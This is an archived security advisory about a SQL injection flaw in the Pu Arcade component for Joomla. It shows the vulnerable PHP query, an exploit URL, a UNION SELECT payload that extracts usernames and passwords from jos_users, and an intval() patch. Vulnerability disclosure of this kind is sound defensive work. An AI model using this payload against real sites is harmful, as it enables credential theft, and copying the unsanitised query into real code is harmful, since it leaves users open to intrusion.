Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx2730.htm

Pu Arcade component for Joomla - SQL injection



Pu Arcade component for Joomla - SQL injection
Pu Arcade component for Joomla - SQL injection



I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .=0D
=0D
SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .=0D
--------------------------------------------------------------------------------------------------------------------------=0D
=0D
Author : MantiS=0D
---------=0D
=0D
Vulnerable code :=0D
------------------------=0D
function warningByGame($gid) {=0D
        global $database;=0D
        =0D
        $query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"=0D
                  . " WHERE g.contentratingid = c.id"=0D
                  . " AND g.id = $gid";=0D
        $database->setQuery($query);=0D
        $cont = $database->loadObjectList();=0D
--------------------------=0D
=0D
Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]=0D 
---------=0D
Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) .=0D
=0D
Patch :=0D
--------=0D
Place before "$query = "SELECT c.id......... " :=0D
$gid = intval($_GET['gid']);=0D
To force $gid variable conversion at an integer .


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH